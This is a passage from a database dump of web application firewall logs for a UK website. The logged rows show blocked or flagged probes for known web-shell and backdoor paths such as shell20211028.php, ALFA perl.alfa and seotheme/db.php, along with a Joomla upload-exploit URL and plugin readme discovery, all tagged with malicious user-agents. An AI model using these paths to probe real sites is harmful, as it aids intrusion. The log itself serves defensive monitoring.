User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhwLnN1c3BlY3RlZA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12614,1675047309.065365,1675047308.942700,'\0\0\0\0\0\0\0\0\0\0�����Q',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocC5zdXNwZWN0ZWQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(12615,1675047308.870707,1675047308.751900,'\0\0\0\0\0\0\0\0\0\0�����Q',0,403,0,0,0,'https://www.dailyjolly.co.uk/plugins/content/apismtp/apismtp.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12616,1675047308.733520,1675047308.562400,'\0\0\0\0\0\0\0\0\0\0�����Q',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FsZmFjZ2lhcGkvcGVybC5hbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(12617,1675047308.679815,1675047308.527000,'\0\0\0\0\0\0\0\0\0\0�����Q',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12618,1675047308.618013,1675047308.462300,'\0\0\0\0\0\0\0\0\0\0�����Q',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12619,1675047308.382949,1675047308.203600,'\0\0\0\0\0\0\0\0\0\0�����Q',0,403,0,0,0,'https://www.dailyjolly.co.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12620,1675047308.342969,1675047308.079300,'\0\0\0\0\0\0\0\0\0\0�����Q',0,403,0,0,0,'https://www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS9hbGZhY2dpYXBpL3BlcmwuYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(12621,1675047308.141279,1675047307.906300,'\0\0\0\0\0\0\0\0\0\0�����Q',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12622,1675048218.393691,1675048218.266700,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,403,0,0,0,'https://dailyjolly.co.uk/1index.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzFpbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12623,1675048216.839979,1675048216.728400,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,403,0,0,0,'https://dailyjolly.co.uk/1index.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzFpbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12624,1675048215.140485,1675048214.995100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,403,0,0,0,'https://dailyjolly.co.uk/wp-includes/shell20211028.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NoZWxsMjAyMTEwMjgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12625,1675048214.015836,1675048213.884800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,403,0,0,0,'https://dailyjolly.co.uk/wp-includes/shell20211028.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NoZWxsMjAyMTEwMjgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12626,1675048212.132580,1675048212.015900,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12627,1675048210.648962,1675048210.505100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12628,1675048151.145556,1675048150.827100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,403,0,0,0,'https://www.dailyjolly.co.uk/1index.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzFpbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12629,1675048150.088866,1675048149.892600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,403,0,0,0,'https://www.dailyjolly.co.uk/1index.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzFpbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12630,1675048147.251684,1675048147.043200,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/shell20211028.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NoZWxsMjAyMTEwMjgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12631,1675048144.605972,1675048104.243200,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12632,1675048136.951155,1675048136.671000,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/shell20211028.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NoZWxsMjAyMTEwMjgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12633,0.000000,1675048481.936188,'\0\0\0\0\0\0\0\0\0\0��6D �',0,200,0,0,0,'https://www.dailyjolly.co.uk/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1','scan:detectproxy',NULL,NULL),(12634,1675060676.358496,1675060676.236100,'\0\0\0\0\0\0\0\0\0\0�����\Z',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/booking-calendar/readme.txt',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9ib29raW5nLWNhbGVuZGFyL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9ib29raW5nLWNhbGVuZGFyL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12635,1675060676.358370,1675060676.236100,'\0\0\0\0\0\0\0\0\0\0�����\Z',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/booking-calendar/readme.txt',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9ib29raW5nLWNhbGVuZGFyL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9ib29raW5nLWNhbGVuZGFyL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12636,1675060625.080659,1675060624.950800,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12637,1675096926.819481,1675096926.692800,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12638,1675120683.251405,1675120683.115700,'\0\0\0\0\0\0\0\0\0\0��PL3',0,403,0,0,0,'https://dailyjolly.co.uk/wp-admin/shell20211028.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCBpNjg2OyBydjoyOC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzI4LjA=\",\"path\":\"L3dwLWFkbWluL3NoZWxsMjAyMTEwMjgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12639,1675138559.875839,1675138559.667400,'\0\0\0\0\0\0\0\0\0\0���&�',0,403,0,0,0,'https://dailyjolly.co.uk/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'ALittle Client','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"QUxpdHRsZSBDbGllbnQ=\",\"path\":\"L2luZGV4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12640,1675191648.576205,1675191648.464200,'\0\0\0\0\0\0\0\0\0\0��gn�M',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12641,1675191645.547012,1675191645.417200,'\0\0\0\0\0\0\0\0\0\0��gn�M',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 